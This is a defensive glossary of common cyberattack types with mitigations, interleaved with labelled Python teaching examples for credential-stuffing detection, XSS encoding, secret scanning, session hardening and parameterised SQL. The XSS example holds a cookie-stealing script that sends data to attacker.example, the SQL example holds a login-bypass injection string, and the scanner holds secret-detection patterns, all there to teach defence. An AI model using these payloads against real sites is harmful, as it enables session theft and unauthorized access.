Cyber Threats and Attacks: A Comprehensive List

Daily reports of cyberattacks, such as ransomware attacks, highlight the endemic nature of security threats. One of the drivers behind the rise in cyber threats is the advancement of AI, which lowers the effort needed to produce convincing phishing, deepfakes, and new malware variants. A recent report from Darktrace on the state of the cybersecurity landscape found that 78% of CISOs believe that AI cyber threats are a reality and that the time to act is now. Education on the Tactics, Techniques, and Procedures (TTPs) behind cyber threats is essential to managing attacks. Here is a comprehensive list of attack types to help build your knowledge base.
Comprehensive List of Cyber Threats and Attacks
Cybercriminals are continually modifying their attack methods. However, the following cyberattack types are the most common and, therefore, the most likely a business will experience:
Account Takeover (ATO)
Identity accounts are fundamental to controlling access to sensitive data, devices, and other IT resources. As a result, accounts are a focus of cyberattacks. A staggering 83% of businesses experience an account takeover attack. ATO attackers use various methods to hijack an account and gain unauthorized access. Methods include social engineering, phishing, Man-in-the-Middle (MitM) attacks, and credential stuffing. Protection measures include robust authentication and security awareness training.
API Gateway Hack
APIs (Application Programming Interfaces) connect services and applications together to add capabilities to a system. An API gateway sits in front of those APIs and handles authentication, routing, and rate limiting for all of them, which makes it a central point of attack. API gateway attacks include exploitation of misconfigured gateway settings (such as routes left without an authentication policy), Distributed Denial of Service (DDoS) attacks, and unauthorized access to the gateway's own management interface. Protection measures include robust authentication and authorization on every route, least privilege access management, enforcement of secure configurations that are reviewed as code, cybersecurity awareness training for IT staff, and rate-limiting controls to blunt DDoS attacks.
Botnets
Certain types of malware are used to infect distributed devices, such as computers and other internet-connected devices, to form a botnet. The botnet is centrally controlled by a cybercriminal, or "bot herder", through a Command and Control (C&C) infrastructure. Phishing and the exploitation of unpatched, internet-exposed devices are typical ways machines are recruited. Once a cybercriminal controls a machine, it can be used to carry out DDoS attacks, distribute spam, and steal employee credentials. Security measures that help include endpoint protection, prompt patching of internet-connected devices, monitoring outbound traffic for C&C beaconing, and robust authentication; dark web monitoring and a VPN (Virtual Private Network) for remote employees address exposed credentials and traffic, not the infection itself.
Business Email Compromise (BEC)
The FBI described BEC as "one of the most financially damaging online crimes". BEC scammers rely on techniques such as social engineering and ATO. Once the attackers have control of email accounts, they can build trusted relationships with finance department employees. These trusted relationships are exploited to manipulate staff into transferring money to a threat actor, who presents themselves as a legitimate business partner or similar. Recent BEC scams include the use of deepfakes to impersonate C-level executives. Security measures to prevent BEC scams include implementing robust processes to verify transactions, enforcing robust access management, and providing security awareness training.
Credential Stuffing
Stolen credentials are sold on the dark web. These login credentials are then used in credential stuffing attacks to gain unauthorized access to accounts. Credential stuffing uses automation to test username and password pairs leaked from one breach against many other sites, relying on the fact that people reuse passwords; the pattern is one source, many accounts, roughly one attempt each, which distinguishes it from a brute-force attack against a single account. Measures used to prevent credential stuffing include dark web monitoring, robust authentication, including multi-factor authentication (MFA), biometric passwordless authentication (FIDO), rate limiting, and checking new passwords against lists of known-breached passwords.
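The detection side of that pattern, as an added example that is not part of the original article: a small analyzer that flags a source IP when it tries many distinct usernames in a short window with mostly failed outcomes. The log format, the sample lines, and the thresholds are constructed for illustration and would be tuned against a real login log.

```python
"""Added example (not from the original article): flag credential-stuffing
patterns in constructed authentication logs. Log format and thresholds are
assumptions for illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: timestamp, source IP, username, outcome.
# 203.0.113.7 sprays six accounts and lands one; 198.51.100.4 is one user
# mistyping a password twice, which must not be flagged.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.7 alice FAIL
2024-05-01T10:00:02Z 203.0.113.7 bob FAIL
2024-05-01T10:00:02Z 203.0.113.7 carol FAIL
2024-05-01T10:00:03Z 203.0.113.7 dave FAIL
2024-05-01T10:00:03Z 203.0.113.7 erin FAIL
2024-05-01T10:00:04Z 203.0.113.7 frank OK
2024-05-01T10:01:10Z 198.51.100.4 alice FAIL
2024-05-01T10:01:40Z 198.51.100.4 alice FAIL
2024-05-01T10:02:05Z 198.51.100.4 alice OK
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (OK|FAIL)$")


def parse(log_text):
    """Parse lines into (timestamp, ip, user, outcome); skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events


def find_stuffing(events, window=timedelta(minutes=5), min_users=5,
                  max_success_rate=0.5):
    """Return {ip: stats} for sources that hit >= min_users distinct accounts
    inside `window` with a mostly failing outcome. A single account failing
    repeatedly is not stuffing and is left to the lockout policy."""
    by_ip = defaultdict(list)
    for ts, ip, user, outcome in events:
        by_ip[ip].append((ts, user, outcome))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            users = {u for _, u, _ in in_window}
            hits = sum(1 for _, _, o in in_window if o == "OK")
            if len(users) >= min_users and hits / len(in_window) <= max_success_rate:
                flagged[ip] = {"distinct_users": len(users),
                               "attempts": len(in_window), "hits": hits}
                break  # one finding per source is enough for an alert
    return flagged


if __name__ == "__main__":
    for ip, stats in find_stuffing(parse(SAMPLE_LOG)).items():
        print(f"possible credential stuffing from {ip}: {stats}")
```

The "hits" count is the part worth acting on: each successful login from a flagged source is an account that was just taken over with a valid password, so it needs a forced reset and session revocation, not only a block on the IP.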
Cross-Site Scripting (XSS)
XSS attackers inject malicious scripts into pages served by a vulnerable website, so that the script runs in other users' browsers with that site's privileges. XSS attacks can lead to session cookie theft and account compromise, data theft, and actions performed as the victim. Those stolen sessions can be the foothold for ransomware and other damaging attacks. Cross-Site Scripting is prevented primarily by encoding untrusted data for the context it is written into (HTML text, attribute, or JavaScript), supported by a CSP (Content Security Policy) that only allows scripts from the same domain or other explicitly allowed sources, cookies marked HttpOnly, and Web Application Firewalls (WAFs) as an additional layer.
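The injection and the two defenses just described, as an added example that is not part of the original article: a vulnerable rendering function beside its encoded form, plus the CSP header that would block an inline script even if an encoding bug slipped through. The payload, function names, and nonce are constructed for illustration.

```python
"""Added example (not from the original article): reflected XSS in a comment
template, the contextual output encoding that fixes it, and a nonce-based CSP
as a second layer. Names and payload are illustrative."""
import html

# Constructed attacker input: a comment that exfiltrates the session cookie.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_unsafe(comment):
    # Vulnerable: untrusted text is concatenated straight into HTML.
    return f'<p class="comment">{comment}</p>'


def render_safe(comment):
    # HTML text context: & < > " ' are escaped, so the browser shows the
    # payload as text instead of executing it.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_safe(username):
    # Attribute context: the attribute is quoted AND quotes inside the value
    # are escaped, otherwise  x" onmouseover="...  breaks out of it.
    # Note: escaping does not validate URL schemes; a javascript: URL in an
    # href needs a separate allow-list check.
    return f'<a href="/users/{html.escape(username, quote=True)}">profile</a>'


def csp_header(script_nonce):
    # Defence in depth: inline scripts without this response's nonce, and
    # scripts from other origins, are refused by the browser.
    return ("Content-Security-Policy: "
            f"default-src 'self'; script-src 'self' 'nonce-{script_nonce}'; "
            "object-src 'none'; base-uri 'none'")


def contains_live_script(rendered):
    # Crude check used by the tests: a raw <script tag reached the output.
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(csp_header("r4nd0mNonce"))
```

The nonce must be generated per response from a CSPRNG and attached to the site's own script tags; a fixed nonce is equivalent to 'unsafe-inline'.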

Cryptojacking
Cryptojacking became widespread as the price of cryptocurrencies soared in the late 2010s. Cryptojacking involves using malware to mine cryptocurrency on infected devices, so the attacker gets the coins and the victim pays for the electricity and compute. The cryptojacking malware is often distributed via the software supply chain, via malicious browser scripts, or by exploiting vulnerable or exposed cloud instances, where the cost shows up as an unexpected cloud bill. Once infected, computers become very slow, impacting productivity. Measures to prevent cryptojacking include security awareness training, anti-malware, security patching, and monitoring for unexplained CPU or cloud spend.
Cyberattack
"Cyberattack" is an umbrella term for the many forms of threat that result in security incidents. Cyberattacks are prolific, sophisticated, and costly. AI is driving even more complex cyberattacks that can be challenging to prevent. The security industry is pushing back by providing deep insights via dark web monitoring into the realm of the cybercriminal. AI-driven antivirus solutions, WAFs, and security awareness training all help to prevent cyberattacks. The use of identity and access management to enforce robust authentication and manage privileges is a fundamental layer of security that helps prevent cyberattacks.
Data Breaches
Data is valuable, which makes it a target for cybercriminals. Data includes sensitive customer information, personal health information (PHI), company secrets, financial information, and login credentials. Data breaches can cost a company financially, damage its reputation, lead to customer losses, and result in non-compliance fines. There are many ways that data breaches occur, but fundamental security measures that help prevent them include robust identity management and least privilege access controls, dark web monitoring to identify stolen data, and security awareness training to prevent phishing.
Data Exfiltration
When data is deliberately and without authorization removed from corporate computing systems, it is said to be exfiltrated. Data exfiltration can be manual or automated. Often, data is stolen over extended periods, and the company remains unaware of its data being exfiltrated. Malware, such as keyloggers, is used to steal the data and send it back to a cybercriminal. Data exfiltration can be prevented using Next-gen antivirus software (NGAV), dark web monitoring, identity management, and least privilege access control.
DDoS Attack
Distributed Denial of Service (DDoS) attacks primarily target websites and other internet-facing services. Ahead of the attack, thousands to hundreds of thousands of devices, including laptops, desktop computers, routers, and IoT devices, are infected with botnet malware; the cybercriminals then use centralized command and control to direct the botnet at the target. The infected devices send massive volumes of traffic, either exhausting the target's network bandwidth, its connection-tracking state (for example with SYN floods), or its application resources with expensive requests, until legitimate users are denied service. DDoS attacks are mitigated with anti-DDoS scrubbing services or CDN-based protection, rate limiting and WAFs for the application layer, and vulnerability patching and cyber awareness training to keep an organization's own devices out of botnets.
Deepfake Attacks
Deepfakes are synthetic audio, images, or video generated with a type of AI known as deep learning. The deepfake is used to create realistic-looking fake media. Deepfakes are used to manipulate and scam people through social engineering. An iProov report found a 704% increase in "face swap" deepfake attacks. Deepfakes can be challenging to detect and prevent. However, security measures that help mitigate deepfake attacks include cross-checks and verification processes that do not rely on recognizing a voice or face (such as calling back on a known number before moving money), and robust identity management and verification systems. Security vendors are starting to offer comprehensive anti-deepfake solutions.
Doxxing
Doxxing refers to the malicious exposure of sensitive or personal information in digital channels, such as social media. The goal of doxxing is to harass, shame, or extort a victim. Companies that experience doxxing of employees can have their reputation damaged, see employee data stolen, and suffer from non-compliance with data protection regulations. The risk of doxxing can be reduced with security awareness training, robust access management over the systems that hold personal data, and dark web monitoring to learn early when that data is circulating.
Eavesdropping Attacks
Eavesdropping can be as simple as listening in on conversations or intercepting private communications by digital means. It can lead to financial theft and fraud, company secret theft, and stolen data. Eavesdropping attackers use various methods to intercept sensitive communications. Preventing eavesdropping requires a multi-layered security approach that includes network monitoring, end-to-end encryption, network segmentation, and security awareness training.
GitHub Leaks
GitHub is a popular repository for data and software code. GitHub has 212 million users and 253 million public repositories (or "repos"). As a popular store of sensitive information, GitHub is a target for cyberattackers. The most common GitHub leak is a secret (an API key, cloud credential, token, or private key) committed to a repository, where it remains in the history even after the file is deleted; other causes include private repositories accidentally made public, over-permissive access settings, and malicious repos that trick developers into running code. Preventing GitHub leaks requires cybersecurity training for developers, secret scanning before commit and on push, regular repository auditing, secure configuration settings, and robust access management and authentication for repositories.
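A pre-commit style check for the first and most common cause, as an added example that is not part of the original article: it scans file contents for well-known token formats and for high-entropy values assigned to secret-like names, so that a placeholder such as "changeme" is not reported. The patterns are simplified forms of public key formats, the sample file is constructed, and both would be tuned for real use.

```python
"""Added example (not from the original article): scan text for committed
secrets. Patterns are simplified versions of well-known token formats and the
sample file is constructed for illustration."""
import math
import re
from collections import Counter

PATTERNS = {
    # AWS access key IDs are 20 characters starting with AKIA (or ASIA for
    # temporary credentials).
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # GitHub tokens: ghp_/gho_/ghu_/ghs_/ghr_ followed by 36 characters.
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # Loose rule: something secret-like assigned a long value; filtered by
    # entropy below so that obvious placeholders are skipped.
    "generic_assignment": re.compile(
        r"(?i)(secret|password|api[_-]?key|token)\s*[:=]\s*['\"]?"
        r"([A-Za-z0-9/+_\-=]{16,})"),
}


def shannon_entropy(s):
    """Bits per character; random tokens score ~4-5, English words ~3."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(text, entropy_threshold=3.5):
    """Return (line_number, rule_name, value) for each likely secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(m.lastindex) if m.lastindex else m.group(0)
                if (name == "generic_assignment"
                        and shannon_entropy(value) < entropy_threshold):
                    continue
                findings.append((lineno, name, value))
    return findings


# Constructed sample: a config file that should never have been committed.
# The AWS key is the documented placeholder from AWS's own examples.
SAMPLE_FILE = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
region = us-east-1
password = changeme_changeme
db_password = "q7Gv9sK2pXmR4tWz8nLb"
# GITHUB_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
"""

if __name__ == "__main__":
    for lineno, rule, value in scan(SAMPLE_FILE):
        print(f"line {lineno}: {rule}: {value[:8]}...")
```

A finding in a file that was already pushed means the secret is compromised and must be rotated; rewriting the history only removes the evidence, not the exposure.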
Insider Threat
Identifying threats from insiders, including employees, contractors, and supply chain partners, is challenging. However, these threats from trusted entities are common. A report on insider threats found that 83% of companies had at least one security incident caused by an insider. Insider threats result in leaked corporate secrets and IP loss, credential theft, and fraud. Insider threats are challenging to detect and prevent because the activity uses legitimate access. However, mitigation of insider-based attacks can be achieved using security measures such as User Behavior Analytics (UBA), dark web monitoring, Privileged Access Management (PAM), least privilege so that no one person can act alone on sensitive data, and Data Loss Prevention (DLP).
Identity Theft
Digital identities are used to access online accounts, networks, devices, data, apps, and other computing resources. As such, a digital identity is valuable to cybercriminals. Identity theft affects individuals and companies. If a business account is hijacked, the identifying information held in the account is at risk. This data can include the company's credentials, such as tax identification number, business license, and credit details. Stolen identities are used to obtain goods, services, or credit and to commit other fraud. The attacker may also sell the stolen digital identities on the dark web to other fraudsters. Javelin Strategy & Research found that identity fraud costs US businesses $23 billion. Security measures used to mitigate identity theft include robust authentication, including biometric passwordless, and security awareness training.
Keylogger
A keylogger is a type of malware that, once installed on a device, captures keystrokes, such as login credentials, and sends the data to a cybercriminal. Keyloggers can cause identity theft, data breaches, and open the door via stolen credentials to ransomware infections and BEC scams. Keylogger infections can be prevented by using next-generation antivirus software (NGAV), implementing security awareness training, and utilizing AI-driven email filters.
Malware & Spyware
Malware is malicious software used to cause harm to computing resources or exploit an individual or business. Spyware is a type of malware that collects sensitive data and sends it to an attacker. Other types of malware include ransomware, banking trojans, botnets, cryptojackers, and adware. Malware can be challenging to prevent, as new forms that evade detection by conventional antivirus solutions are proliferating. However, next-gen antivirus software (NGAV) helps to detect these evasive strains. Other measures that can prevent malware infections include security awareness training and anti-phishing tools.
Man-in-the-Middle Attacks (MitM)
A MitM attack is a method used to intercept, and often alter, an online communication, such as an email message or a web session, by placing the attacker between the two parties. Login credentials are a target for MitM attacks; if credentials are submitted unprotected, they can be intercepted and stolen. MitM attacks can result in ATO, ransomware infection, IP and company secrets theft, and fraud. MitM attacks can be prevented using a layered security approach that includes end-to-end encryption of data transmissions with proper certificate validation (TLS, with HSTS so that browsers refuse plain HTTP), WPA2 or WPA3 encryption on wireless access points (WEP is broken and should not be used), phishing-resistant multi-factor authentication (MFA), dark web monitoring, and robust access management.
MFA Bypass
Multi-factor authentication (MFA) is used as a layer of security that helps protect access to accounts and sensitive information. However, in recent years, cybercriminals have developed methods to bypass this layer of security. Techniques to bypass multi-factor authentication include social engineering, such as tricking someone into believing they are dealing with IT support or bombarding them with push prompts until they approve one (MFA fatigue); adversary-in-the-middle phishing pages that relay the one-time code to the real site as it is typed; session hijacking, which steals the session cookie issued after MFA has already succeeded; and SIM swapping to receive SMS codes. MFA is still an important security layer. The relay and SIM-swap techniques are defeated by phishing-resistant methods such as FIDO2/passkeys (biometric passwordless authentication), which bind the credential to the genuine site, and security awareness training helps with the social engineering variants.
Passwords
Passwords are the most common method to control access. They are easy to use and implement. However, passwords are also plagued by security issues, including password fatigue, reuse across multiple apps and devices, and phishing. Passwords are being replaced by phishing-resistant MFA and biometric passwordless authentication.
Pharming Attack
The Domain Name System (DNS) is often thought of as the "phonebook of the internet"; the DNS translates human-readable website names into the IP addresses that machines use, routing the user to the correct site. Pharming is a DNS-based attack that manipulates that translation, whether by poisoning a resolver's cache, changing the DNS settings on a home router, or editing the hosts file on a compromised machine, so that when someone enters the name of a website in their browser, they are sent to a malicious site instead. This site is then often used to steal sensitive data, including login credentials. Pharming prevention requires securing the DNS (DNSSEC validation and encrypted DNS to a trusted resolver), keeping routers, software, and systems patched, and consistent use of HTTPS: a pharmed site cannot present a valid certificate for the real domain, so certificate warnings must be treated as a stop sign rather than clicked through.
Phishing
Phishing is used to steal data, such as login credentials. It is human-centered, utilizing psychology to manipulate employees and others into performing actions that lead to data theft and other cyberattacks. This action typically tricks the victim into clicking a malicious link that directs them to a malicious website. Phishing utilizes various communication channels to deliver its attack. Channels include email, SMS text messages (Smishing), voice calls (Vishing), and social media posts. Phishing prevention encompasses security awareness training, phishing simulation exercises, and anti-phishing tools, including email filters.

Ransomware
Ransomware is a type of malware that is used to extort money from a victim organization. It typically works by encrypting files and documents across a network, connected devices, and cloud repositories. Modern ransomware usually also steals the data and holds it as ransom leverage, threatening to release it or sell it on the dark web. Ransomware infections occur via various mechanisms, including phishing, stolen credentials on exposed remote access services, and misconfiguration of cloud apps. Layered security measures are needed to prevent ransomware infection. These measures should include security awareness training, robust access and authentication controls, dark web monitoring, offline or immutable backups that are tested by actually restoring from them, Endpoint Detection and Response (EDR) solutions, and anti-malware.
Rootkit
A rootkit is a set of malicious tools (malware) designed to gain privileged, often kernel-level, control of a device and then hide its own presence from the operating system and security tools. The initial infection typically arrives via phishing, a software vulnerability, or a malicious driver. Once installed, the rootkit performs malicious actions and sends data back to the attacker via a command and control (C&C) channel, while concealing its files, processes, and network connections. Because it runs beneath the layer conventional antivirus (AV) relies on, a rootkit is difficult to detect from within the running system. Best practice measures include next-gen antivirus software (NGAV) and EDR, and, more fundamentally, enforcing Secure Boot and driver signing so that unsigned kernel code cannot load, with measured boot or remote attestation to detect a compromised boot chain.
Session Hijacking
When a cybercriminal steals or forges the session identifier that a web app issues after login, and uses it to take over the interaction between the user and the app, the tactic is known as session hijacking. Because the session was established after authentication, the attacker is already logged in and can use it to steal data, bypass MFA, commit identity theft and ATO attacks, access bank accounts, and so on. Session hijacking can be prevented by correctly implementing TLS (Transport Layer Security) so the identifier never travels in clear text, and by robust session management: unpredictable session IDs, a new ID issued at login, idle and absolute expiry, and cookies set with the Secure, HttpOnly, and SameSite attributes so they are not exposed to network sniffing, XSS, or cross-site requests.
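Those session-management properties in one place, as an added example that is not part of the original article: a minimal server-side session store with CSPRNG identifiers, rotation at login, idle expiry, and the Set-Cookie header a practitioner would expect. Class and function names are illustrative; a real application would use its framework's session layer with the same settings.

```python
"""Added example (not from the original article): a minimal session store
showing unpredictable IDs, rotation at login, idle timeout, and hardened
cookie attributes. Names are illustrative."""
import secrets
import time

SESSION_TTL = 15 * 60  # seconds of inactivity before a session is dropped


class SessionStore:
    def __init__(self, clock=time.time):
        self._sessions = {}   # session_id -> {"user": ..., "last_seen": ...}
        self._clock = clock   # injectable so expiry can be tested

    def create(self, user=None):
        # 256 bits from the OS CSPRNG; never a counter, timestamp or user id,
        # which an attacker could guess or enumerate.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def login(self, old_sid, user):
        """Rotate the ID on privilege change, so an ID sniffed or fixated
        before login does not turn into an authenticated session."""
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def logout(self, sid):
        # Server-side invalidation: clearing the cookie alone leaves a
        # stolen copy usable until it expires.
        self._sessions.pop(sid, None)

    def _touch(self, sid):
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._clock() - s["last_seen"] > SESSION_TTL:
            del self._sessions[sid]   # idle timeout: treat as unauthenticated
            return None
        s["last_seen"] = self._clock()
        return s

    def is_valid(self, sid):
        return self._touch(sid) is not None

    def user_for(self, sid):
        s = self._touch(sid)
        return None if s is None else s["user"]


def set_cookie_header(sid):
    # Secure: sent only over TLS. HttpOnly: unreadable by page scripts, so
    # XSS cannot exfiltrate it. SameSite=Lax: not attached to cross-site
    # POSTs. The __Host- prefix makes the browser refuse the cookie unless
    # it is Secure, has Path=/ and no Domain attribute.
    return (f"Set-Cookie: __Host-session={sid}; Path=/; Secure; HttpOnly; "
            "SameSite=Lax")


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    auth = store.login(anon, "alice")
    print(set_cookie_header(auth))
    print("old id still valid:", store.is_valid(anon))
```

An absolute lifetime (for example, re-authenticate after 12 hours regardless of activity) is the usual companion to the idle timeout shown here.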
Smishing
Smishing or SMS text phishing, is a type of phishing. The hackers send out phishing messages to a victim, manipulating them into clicking a link or calling a malicious phone number. Cybercriminals find phone numbers to target on the dark web. The result of smishing includes stolen login credentials and financial scams. Prevention includes security awareness training, anti-phishing tools that block access to malicious websites, and MFA or biometric passwordless authentication.
Social Engineering
Many cyberattacks employ an element of social engineering, which involves manipulating natural human behavior. Social engineering, for example, was used to trick help desk operators into handing over access to accounts by exploiting password resets. Once access was gained, the attackers could escalate privileges, allowing them to install ransomware on the networks of various UK retailers. Social engineering attacks can be mitigated by training employees and technical staff on tricks used to manipulate their behavior. Other measures, such as multi-factor authentication and passwordless authentication, as well as next-generation antivirus (NGAV), can help mitigate the impact of social engineering.
Spoofing
Spoofing is a type of cyber-deception in which the attacker fakes the identity of a trusted party, such as the sender address of an email, a caller ID, or a website, to trick organizations into handing over large sums of money and sensitive data. Like phishing, spoofing exploits trusted relationships. For example, spoofing may involve impersonating a trusted person, such as a CEO, to manipulate the target into performing an action that benefits the attacker. Business Email Compromise (BEC) frequently relies on spoofing. Social engineering is the driver of spoofing, which can result in stolen credentials, ATO, financial fraud, and malware infections. Mitigation of spoofing involves email authentication (SPF, DKIM, and DMARC with an enforcing policy so that forged messages from your domain are rejected), security awareness training, process cross-checks, incident reporting, and AI-powered anti-phishing solutions.
SQL Injection Attacks (SQLi)
SQL statements are used to perform legitimate database tasks. During a SQL Injection attack, user-supplied input is concatenated into a SQL statement and changes its structure, allowing cybercriminals to read, modify, or delete data they should not be able to reach, and sometimes to bypass authentication entirely. SQLi attacks are prevented primarily by using parameterized queries (prepared statements), which send values separately from the SQL text; input validation, least privilege for the database account the application uses, and a web application firewall are additional layers, not substitutes.
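The authentication bypass just described against an in-memory SQLite table, as an added example that is not part of the original article, with the vulnerable query beside the parameterized one. The table, the rows, and the injection string are constructed for illustration; real applications store password hashes, not the plaintext used here for brevity.

```python
"""Added example (not from the original article): SQL injection against a
login query and the parameterised query that defeats it. Table, data and
payload are constructed for illustration."""
import sqlite3


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    # Plaintext passwords only to keep the demo short; store hashes in reality.
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "battery-staple", "user")])
    return conn


def login_vulnerable(conn, username, password):
    # The user-supplied strings become part of the SQL text itself.
    query = (f"SELECT username, role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_parameterised(conn, username, password):
    # Placeholders: the driver sends values separately from the statement,
    # so a quote in the input cannot change the query's structure.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Constructed attacker input: closes the string literal, adds an always-true
# clause, and comments out the password check with "--".
INJECTION = "alice' OR '1'='1' -- "

if __name__ == "__main__":
    conn = setup()
    print("vulnerable:", login_vulnerable(conn, INJECTION, "wrong"))
    print("parameterised:", login_parameterised(conn, INJECTION, "wrong"))
```

With the vulnerable function the attacker logs in as the first matching row, which is the admin account; with placeholders the same input is simply a username that does not exist.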
TrickBot
TrickBot is a type of malware that is designed to evolve constantly. Its modular architecture lets the operators add new capabilities, such as scanning for open ports, without rewriting the core. TrickBot malware is usually delivered using phishing. TrickBot infections lead to credential and data theft, installation of backdoors to allow network access, and ransomware attacks. This malware is challenging to detect. Best practice security measures include next-generation antivirus (NGAV) solutions, as well as network scanning and security awareness training, which can help prevent infections.

Vishing Attacks
Vishing, also known as voice phishing, is a type of phishing that uses phone calls to deceive individuals into disclosing sensitive and financial information. It is a form of impersonation attack that uses methods including caller ID spoofing and AI voice deepfakes. Highly targeted vishing campaigns use the dark web to gather intelligence on their targets. Social engineering tactics, such as manufactured urgency, underpin vishing. Best practices to mitigate vishing attacks include security awareness training, dark web monitoring, and regular process checks such as calling the requester back on a known number.
Whaling
Whaling attacks target senior-level executives and managers in an attempt to exploit a company. Whaling attacks are highly targeted, and the cybercriminals often use the dark web to gather intelligence on the victim. Attackers focus on sensitive information and critical data, including financial data. Whaling attacks use social engineering to manipulate and deceive their high-level targets to transfer large sums of money to a hacker's bank account, access sensitive corporate data and IP, and manipulate corporate policies to cause harm to a company. Whaling can be prevented through security awareness training of senior management and board members, dark web monitoring, and robust access management.
Zero-Day Vulnerability
Vulnerabilities are flaws in software, firmware, hardware, or processes. Often, vulnerabilities are discovered during testing or after release and are then quickly addressed. However, some are discovered and exploited by attackers before the vendor knows about them. These are zero-day vulnerabilities, i.e., the vendor has had zero days to fix the flaw before it is exploited, so no patch exists at the time of the attack. Zero-day vulnerabilities are exploited in various types of cyberattacks, including ransomware, data breaches, and fraud. Because patching cannot help until a fix ships, mitigation of zero-day flaws relies on the other layers of security limiting what an exploit can achieve: least privilege and robust identity and access management, network segmentation and monitoring, EDR, encryption of sensitive data, and dark web monitoring; prompt patching once the fix is released closes the window before the flaw becomes a widely exploited "n-day".
The above list of cyberattack types is not exhaustive. Cybercriminals continually look for new ways to exploit and harm individuals and businesses. The advent of AI-driven cybercrime is creating challenges in the detection and prevention of sophisticated cyberattacks that involve LLMs and deepfakes. However, security vendors are pushing back with AI-driven and effective solutions. With the average cost of a data breach hitting $4.44 million, cyberattack resilience is essential for any business. Ultimately, there is no one solution that fits all cyberattack scenarios. Instead, an organization must use a multi-layered, defense-in-depth approach to securing its people, network, and processes.